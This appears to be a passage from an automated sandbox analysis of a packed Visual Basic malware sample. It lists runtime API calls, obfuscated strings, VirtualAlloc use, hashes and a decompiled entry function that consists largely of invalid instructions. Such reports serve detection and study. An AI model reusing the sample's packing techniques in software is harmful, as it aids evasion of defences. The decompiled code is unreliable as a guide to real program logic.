__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,000000F8), ref: 0040D342
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D369
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040D3A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000128), ref: 0040D3EF
__vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040D4B5
__vbaFreeVar.MSVBVM60 ref: 0040D4C0
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D4D8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D511
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000050), ref: 0040D555
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D57C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5B5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000170), ref: 0040D5FF
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D626
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D65F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000060), ref: 0040D6A6
__vbaChkstk.MSVBVM60(002900F5,Dlgsmaals,00000009,00000003,0B47A6A0), ref: 0040D766
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B17C,00000704), ref: 0040D7AB
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040D7CD
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000009,00000003), ref: 0040D7E9
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B14C,000002B4), ref: 0040D823
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D84A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D883
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000060), ref: 0040D8CA
__vbaNew2.MSVBVM60(0040A880,00410010,00000000,?,0040B424,00000060), ref: 0040D8F1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D92A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B424,000000F8), ref: 0040D974
__vbaNew2.MSVBVM60(0040A880,00410010,00000000,00000000,0040B424,000000F8), ref: 0040D99B
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040D9D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000128), ref: 0040DA21
__vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040DAE7
__vbaFreeVar.MSVBVM60 ref: 0040DAF2
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040DB0A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DB43
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000050), ref: 0040DB87
__vbaNew2.MSVBVM60(0040A880,00410010,00000000,?,0040B49C,00000050), ref: 0040DBAE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DBE7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B424,00000170), ref: 0040DC31
__vbaNew2.MSVBVM60(0040A880,00410010,00000000,00000000,0040B424,00000170), ref: 0040DC58
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DC91
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000060), ref: 0040DCD8
__vbaChkstk.MSVBVM60(002900F5,Dlgsmaals,00000009,00000003,0B47A6A0), ref: 0040DD98
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B17C,00000704), ref: 0040DDDD
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040DDFF
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000009,00000003), ref: 0040DE1B
__vbaNew2.MSVBVM60(0040A880,00410010,?,?,?,?,?,?,0040A880,00410010), ref: 0040DE36
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DE6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000128), ref: 0040DEBC
__vbaNew2.MSVBVM60(0040A880,00410010,00000000,?,0040B49C,00000128), ref: 0040DEE3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DF1C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B49C,00000120), ref: 0040DF66
__vbaVarDup.MSVBVM60(00000000,00000000,0040B49C,00000120), ref: 0040DFD0
__vbaChkstk.MSVBVM60(00000009,F61631D0), ref: 0040DFE6
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040E025
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000009), ref: 0040E03A
__vbaNew2.MSVBVM60(0040A880,00410010,?,?,?,?,0040A880,00410010,?,?,?,?,?,?,0040A880,00410010), ref: 0040E055
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E08E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,000000F8), ref: 0040E0D8
__vbaStrCopy.MSVBVM60(00000000,?,0040B424,000000F8), ref: 0040E0F4
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B17C,000006FC), ref: 0040E15F
__vbaFreeVar.MSVBVM60(00000000,00401148,0040B17C,000006FC), ref: 0040E186
__vbaFreeVar.MSVBVM60(0040E231), ref: 0040E22B

Strings

snydertampenes, xrefs: 0040CB3C
Oksehoveders, xrefs: 0040CA1A
HALFPACE, xrefs: 0040CCF8, 0040DFB3
=hC, xrefs: 0040C342, 0040C348
TCHADERE, xrefs: 0040C30A, 0040E0EC
SIGNIFIKANSNIVEAUERS, xrefs: 0040C5DB
Rearouses, xrefs: 0040D464, 0040DA96
demideity, xrefs: 0040CB55
unrecumbently, xrefs: 0040C630
Dlgsmaals, xrefs: 0040D757, 0040DD89

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$List$Chkstk$Copy$CallLate$BstrMove
String ID: =hC$Dlgsmaals$HALFPACE$Oksehoveders$Rearouses$SIGNIFIKANSNIVEAUERS$TCHADERE$demideity$snydertampenes$unrecumbently
API String ID: 592220026-1976536754
Opcode ID: efc8f0e24d8eee6de1b3276a48bbb7c88ba94c49acfc86bf94301b2103ecf6f3
Instruction ID: 894cd850340c7eccdb15a5c604ab3dfdfc086a3d3227ec0902b1bffd667d0b83
Opcode Fuzzy Hash: efc8f0e24d8eee6de1b3276a48bbb7c88ba94c49acfc86bf94301b2103ecf6f3
Instruction Fuzzy Hash: 4A23D67190021CDFDB21DF90CC85BD9BBB4BB08304F1085EAE549BB2A1DBB95A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004030E7, Relevance: 5.0, APIs: 1, Strings: 2, Instructions: 451memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

]vvv, xrefs: 004030E9
{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ]vvv${0C&
API String ID: 4275171209-4171625383
Opcode ID: 9b0487870c1d594ab670a1d75c17941cb737f4116d7938148629c4d8e5ff61ee
Instruction ID: e2f5a7a88a531d453b4ae07f051758b931791b7f8fce45f6062d1396af9d2923
Opcode Fuzzy Hash: 9b0487870c1d594ab670a1d75c17941cb737f4116d7938148629c4d8e5ff61ee
Instruction Fuzzy Hash: 04819C31D5864065D11EAD61444F97A2E6CDA9A3037308AFF87F27A2F6923D8F07518F

Uniqueness

Uniqueness Score: -1.00%

Function 00401394, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 28%

			_entry_(signed int __eax, signed int __ebx, signed char __ecx, signed int __edx, intOrPtr* __edi, intOrPtr* __esi) {
				signed int _t44;
				signed int _t45;
				void* _t46;
				signed int _t47;
				signed char _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t54;
				signed int _t55;
				signed char _t58;
				signed int _t59;
				intOrPtr* _t60;
				signed int _t63;
				void* _t67;
				void* _t69;

				_t61 = __esi;
				_t60 = __edi;
				_t59 = __edx;
				_t58 = __ecx;
				_t55 = __ebx;
				_push("VB5!6&*"); // executed
				L0040138E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t44 = __eax + 1;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + __ecx;
				if( *_t44 < 0) {
					_t1 = _t44;
					_t44 = _t63;
					_t63 = _t1;
					asm("out dx, eax");
					_t61 =  *__edx;
					 *__edx = __esi;
				}
				asm("o16 add [eax], al");
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				_t67 =  *((intOrPtr*)(_t60 + 0x6e410305)) - _t58;
				asm("popad");
				if(_t67 == 0) {
					L9:
					 *_t44 =  *_t44 + _t44;
					_t45 = _t44;
					__eflags = _t45;
					asm("arpl [edx+0x6f], si");
					if(__eflags >= 0) {
						L15:
						 *_t45 =  *_t45 + _t45;
						 *_t45 =  *_t45 + _t45;
						 *_t45 =  *_t45 + _t45;
						asm("invalid");
						 *_t45 =  *_t45 + 1;
						_t46 = _t45 + 0x200fcf3;
						 *[fs:eax] =  *[fs:eax] + 1;
						_push(es);
						_t58 = _t58 | _t55;
						 *((intOrPtr*)(_t46 + _t58 + 0xa500f2)) =  *((intOrPtr*)(_t46 + _t58 + 0xa500f2)) + _t46;
						_t61 = _t61 + 1;
						_t47 = _t46 + _t59;
						__eflags = _t47;
						asm("aam 0x0");
						 *_t47 =  *_t47 + _t47;
						goto 0x1fb7;
						 *_t58 =  *_t58 + _t59;
						 *[fs:eax] =  *[fs:eax] + _t47;
						_t45 = _t47 + 0x3a00562c;
						__eflags = _t45;
						if(__eflags >= 0) {
							L13:
							_t49 = _t45 + _t58 +  *((intOrPtr*)(_t45 + _t58));
							 *_t61 =  *_t61 + _t49;
							 *_t49 =  *_t49 + _t49;
							 *_t49 =  *_t49 + _t49;
							 *_t49 =  *_t49 & _t49;
							 *_t49 =  *_t49 + _t49;
							 *_t49 =  *_t49 + _t49;
							 *((intOrPtr*)(_t49 + 0xe000008)) =  *((intOrPtr*)(_t49 + 0xe000008)) + _t58;
							_t50 = _t49 +  *_t49;
							 *_t50 =  *_t50 + _t58;
							 *_t50 =  *_t50 + _t50;
							 *_t50 =  *_t50 + _t50;
							 *_t50 =  *_t50 + _t50;
							 *_t50 =  *_t50 + _t50;
							 *_t50 =  *_t50 + _t50;
							 *_t50 =  *_t50 + _t50;
							_t45 = _t50;
							 *_t45 =  *_t45 + _t45;
							 *_t45 =  *_t45 + _t45;
							 *_t59 =  *_t59;
							 *_t45 =  *_t45 + _t45;
							 *_t45 =  *_t45 + _t45;
							 *_t45 =  *_t45 + _t45;
							__eflags =  *_t45;
							L14:
							 *_t45 =  *_t45 + _t45;
							 *_t45 =  *_t45 + _t45;
							 *_t45 =  *_t45 + _t45;
							__eflags =  *_t45;
							goto L15;
						}
						_t51 = _t45 + _t45;
						asm("rol al, 0x0");
						 *((char*)(_t51 + 0x40400080)) =  *((char*)(_t51 + 0x40400080)) + 0x40;
						 *_t51 =  *_t51 + _t51;
						 *_t51 =  *_t51 + _t51;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						do {
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("clc");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("int1");
							asm("sbb [ebx-0x45], cl");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("sbb [edi-0x4488], dh");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("sbb [esi+0x66], dh");
						} while (__eflags < 0);
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("std");
						asm("sbb [ebp+0x36], ah");
						asm("o16 js 0xff92");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("sbb [eax+0x75], ah");
						_t52 = _t51 ^ 0xffff8f66;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("sbb [eax+esi*2+0x55], ch");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("std");
						asm("sbb [esp+ecx*8-0x39], ch");
						_push(_t61);
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("std");
						asm("sbb [esp+ecx*8-0x34], ch");
						_push(es);
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("std");
						asm("sbb [edi+0x7c], ah");
						asm("int3");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("sbb [esi-0x70398399], dh");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("sbb [esi-0x70f998e5], al");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("ror dword [eax-0x70e9999a], 1");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *_t52 = _t69 +  *((intOrPtr*)(_t61 - 0x7099449a));
						_t25 = _t61 + 0x68;
						_t53 =  *_t25;
						 *_t25 = _t52;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("sbb [eax-0x7778], cl");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("adc [eax-0x7778], ecx");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("int1");
						 *(_t53 - 0x71) = _t58;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						_push(_t58);
						asm("sbb [eax-0x1], cl");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("clc");
						asm("invalid");
						asm("int1");
						asm("sbb [edi-0x1], cl");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("clc");
						asm("invalid");
						asm("int1");
						asm("sbb [edi-0x1], cl");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t60 - 0x7eee01)) =  *((intOrPtr*)(_t60 - 0x7eee01)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t53 - 0x67e601)) =  *((intOrPtr*)(_t53 - 0x67e601)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t53 - 0x760201)) =  *((intOrPtr*)(_t53 - 0x760201)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t53 - 0x670671)) =  *((intOrPtr*)(_t53 - 0x670671)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("clc");
						 *(_t58 - 1) = _t58;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t53 - 0x77772723)) =  *((intOrPtr*)(_t53 - 0x77772723)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t60 - 0x77272203)) =  *((intOrPtr*)(_t60 - 0x77272203)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *((intOrPtr*)(_t60 - 0x27220e01)) =  *((intOrPtr*)(_t60 - 0x27220e01)) - 1;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("std");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						goto __eax;
					}
					asm("arpl [ebp+0x74], si");
					if(__eflags == 0) {
						goto L14;
					}
					asm("outsb");
					 *_t60 =  *_t60 + _t58;
					 *_t59 =  *_t59 + _t58;
					 *((intOrPtr*)(_t59 + 0x65)) =  *((intOrPtr*)(_t59 + 0x65)) + _t45;
					_push(0x65706c6a);
					asm("insb");
					 *_t59 =  *_t59 + _t45;
					 *_t55 =  *_t55 + _t45;
					__eflags =  *_t55;
					_t61 = 0x6c00000b;
					if ( *_t55 == 0) goto L12;
					 *0x6C000016 =  *((intOrPtr*)(0x6c000016)) + _t59;
					 *_t58 =  *_t58 + _t45;
					 *_t59 =  *_t59 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 & _t59;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					__eflags =  *_t45;
					goto L13;
				}
				asm("insd");
				if(_t67 >= 0) {
					_t60 = _t60 - 1;
					asm("lodsd");
					_t54 = _t44;
					asm("stosb");
					_t8 = _t54 - 0x2d;
					 *_t8 =  *(_t54 - 0x2d) + _t54;
					__eflags =  *_t8;
					_t44 = _t55 ^  *(_t58 - 0x48ee309a);
					_t55 = _t54;
					L8:
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					 *_t44 =  *_t44 + _t44;
					__eflags =  *((intOrPtr*)(_t60 + 0xc110000)) - _t58;
					 *_t44 =  *_t44 + _t44;
					__eflags =  *_t44;
					goto L9;
				}
				 *_t44 =  *_t44 + _t58;
				_t58 = _t58 + 1;
				 *_t44 =  *_t44 + _t44;
				 *_t58 =  *_t58 | _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 ^ _t44;
				_t59 = _t59 |  *(_t55 + _t59 * 2 - 0x7fe85b3d);
				asm("xlatb");
				_t55 = _t55 + 1;
				asm("invalid");
				asm("salc");
				if(_t55 == 0) {
					goto L8;
				}
				asm("in eax, dx");
				asm("fidivr dword [edi]");
				asm("popad");
				return _t44;
			}

0x00401394
0x00401394
0x00401394
0x00401394
0x00401394
0x00401394
0x00401399
0x0040139e
0x004013a0
0x004013a2
0x004013a4
0x004013a6
0x004013a8
0x004013a9
0x004013ab
0x004013ad
0x004013af
0x004013b1
0x004013b3
0x004013b3
0x004013b3
0x004013b9
0x004013ba
0x004013ba
0x004013bc
0x004013bf
0x004013c2
0x004013c4
0x004013c6
0x004013c8
0x004013ca
0x004013cc
0x004013d2
0x004013d3
0x00401444
0x00401444
0x00401446
0x00401446
0x00401448
0x0040144b
0x004014c0
0x004014c0
0x004014c2
0x004014c4
0x004014c6
0x004014c8
0x004014ca
0x004014cf
0x004014d2
0x004014d3
0x004014d5
0x004014dc
0x004014dd
0x004014dd
0x004014de
0x004014e0
0x004014e2
0x004014e9
0x004014eb
0x004014ee
0x004014ee
0x004014f3
0x00401485
0x00401487
0x00401489
0x0040148b
0x0040148d
0x0040148f
0x00401491
0x00401493
0x00401495
0x0040149b
0x0040149d
0x0040149f
0x004014a1
0x004014a3
0x004014a5
0x004014a8
0x004014aa
0x004014ac
0x004014ae
0x004014b0
0x004014b2
0x004014b5
0x004014b7
0x004014b9
0x004014b9
0x004014bb
0x004014bb
0x004014bd
0x004014bf
0x004014bf
0x00000000
0x004014bf
0x004014f5
0x004014f7
0x004014fa
0x00401501
0x00401503
0x00401507
0x00401509
0x0040150b
0x0040150c
0x0040150c
0x0040150e
0x00401510
0x00401512
0x00401514
0x00401516
0x00401518
0x0040151a
0x0040151c
0x0040151f
0x00401521
0x00401523
0x00401525
0x00401527
0x00401529
0x0040152b
0x0040152c
0x00401532
0x00401534
0x00401536
0x00401538
0x0040153a
0x0040153c
0x00401542
0x00401544
0x00401546
0x00401548
0x0040154a
0x0040154c
0x0040154c
0x00401551
0x00401553
0x00401555
0x00401557
0x00401559
0x0040155b
0x0040155c
0x0040155f
0x00401562
0x00401564
0x00401566
0x00401568
0x0040156a
0x0040156c
0x0040156f
0x00401574
0x00401576
0x00401578
0x0040157a
0x0040157c
0x00401580
0x00401583
0x00401585
0x00401587
0x00401589
0x0040158b
0x0040158c
0x00401590
0x00401591
0x00401593
0x00401595
0x00401597
0x00401599
0x0040159b
0x0040159c
0x004015a0
0x004015a1
0x004015a3
0x004015a5
0x004015a7
0x004015a9
0x004015ab
0x004015ac
0x004015af
0x004015b0
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015c2
0x004015c4
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015d2
0x004015d4
0x004015d6
0x004015d8
0x004015da
0x004015e2
0x004015e4
0x004015e6
0x004015e8
0x004015ea
0x004015ec
0x004015f2
0x004015f4
0x004015f6
0x004015f8
0x004015fa
0x004015fc
0x004015fe
0x004015fe
0x004015fe
0x00401601
0x00401603
0x00401605
0x00401607
0x00401609
0x0040160b
0x0040160d
0x00401613
0x00401615
0x00401617
0x00401619
0x0040161b
0x0040161d
0x00401623
0x00401625
0x00401627
0x00401629
0x0040162b
0x0040162d
0x0040162e
0x00401634
0x00401636
0x00401638
0x0040163a
0x0040163c
0x0040163e
0x00401644
0x00401646
0x00401648
0x0040164a
0x0040164b
0x0040164d
0x0040164e
0x00401654
0x00401656
0x00401658
0x0040165a
0x0040165b
0x0040165d
0x0040165e
0x00401664
0x00401666
0x00401668
0x0040166a
0x00401670
0x00401672
0x00401674
0x00401676
0x00401678
0x0040167a
0x00401680
0x00401682
0x00401684
0x00401686
0x00401688
0x0040168a
0x00401690
0x00401692
0x00401694
0x00401696
0x00401698
0x0040169a
0x004016a0
0x004016a2
0x004016a4
0x004016a6
0x004016a8
0x004016ac
0x004016ad
0x004016b3
0x004016b5
0x004016b7
0x004016b9
0x004016bf
0x004016c1
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016d1
0x004016d3
0x004016d5
0x004016d7
0x004016d9
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016ee
0x004016f0
0x004016f2
0x004016f4
0x004016f6
0x004016f8
0x004016fa
0x004016fc
0x004016fe
0x00401700
0x00401702
0x00401704
0x00401706
0x00401708
0x0040170a
0x0040170a
0x0040144d
0x00401450
0x00000000
0x00000000
0x00401452
0x00401453
0x00401456
0x00401458
0x0040145b
0x00401460
0x00401468
0x0040146a
0x0040146a
0x0040146c
0x00401471
0x00401473
0x00401479
0x0040147b
0x0040147d
0x0040147f
0x00401481
0x00401483
0x00401483
0x00000000
0x00401483
0x004013d5
0x004013d6
0x0040140a
0x0040140b
0x00401412
0x00401414
0x00401415
0x00401415
0x00401415
0x00401418
0x00401418
0x00401419
0x00401419
0x0040141b
0x0040141d
0x0040141f
0x00401421
0x00401423
0x00401425
0x00401427
0x00401429
0x0040142b
0x0040142d
0x0040142f
0x00401431
0x00401433
0x00401435
0x00401437
0x00401439
0x0040143b
0x0040143d
0x00401443
0x00401443
0x00000000
0x00401443
0x004013d8
0x004013da
0x004013db
0x004013dd
0x004013e0
0x004013e2
0x004013e6
0x004013e8
0x004013ef
0x004013f0
0x004013f1
0x004013f5
0x004013f6
0x00000000
0x00000000
0x004013f8
0x004013fa
0x004013fc
0x004013fd

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401399

Strings

VB5!6&*, xrefs: 00401394

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 72a8f07f0bd85e2269a13c5c65c32bbe1d07106307536d21dff8744e6b51bab3
Instruction ID: 8ba0bf8d4512ee3fec0586a84cf5d4bc56dff06770b28297f45e07c8640b2c4b
Opcode Fuzzy Hash: 72a8f07f0bd85e2269a13c5c65c32bbe1d07106307536d21dff8744e6b51bab3
Instruction Fuzzy Hash: 9E41986294E3C18FD7038B70886A5917FB0AE23264B1E45EBC4C1DF0F3E22C485AD726

Uniqueness

Uniqueness Score: -1.00%

Function 00402629, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 470memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 88abc5b922672f2c246cb8530ee322caf3c931d2542c299a02c76be87265534e
Instruction ID: 8c1dfa21fd696d3021ba2836c2986a291a7c256e581fcc25113381bab29cf0a9
Opcode Fuzzy Hash: 88abc5b922672f2c246cb8530ee322caf3c931d2542c299a02c76be87265534e
Instruction Fuzzy Hash: 3CA19B42D3DB00D9E107693085885B12A58FF97347370EB7F9873B61E2A67E0E4B248E

Uniqueness

Uniqueness Score: -1.00%

Function 004026E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 463memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 1a0631c79cd5aa575ef3a657f5464d9250103feb167fc44b4e59a55fc26c7907
Instruction ID: 457eb0ecdf35f7860482ec1bd30ab679dc01f222930aec7f077e0459242be99b
Opcode Fuzzy Hash: 1a0631c79cd5aa575ef3a657f5464d9250103feb167fc44b4e59a55fc26c7907
Instruction Fuzzy Hash: AF919A42D3DB01D9E107693085885B12A58FF97347370EB7F9877B61E2A67E0E4B248A

Uniqueness

Uniqueness Score: -1.00%

Function 0040272B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 458memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 8bf93be9110774b1e21a4c29202d3720078dc6a096c78b4bef39a339da5237df
Instruction ID: 55a1cc1781c7eb9d98a15a51e5b9a55954f0f5b45b830b253af66a168ed3415f
Opcode Fuzzy Hash: 8bf93be9110774b1e21a4c29202d3720078dc6a096c78b4bef39a339da5237df
Instruction Fuzzy Hash: DD918B82D3DB01D9E107593085885B12A58FF97347370EB7F9877B61E2A67E0E4B248E

Uniqueness

Uniqueness Score: -1.00%

Function 0040277D, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 448memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

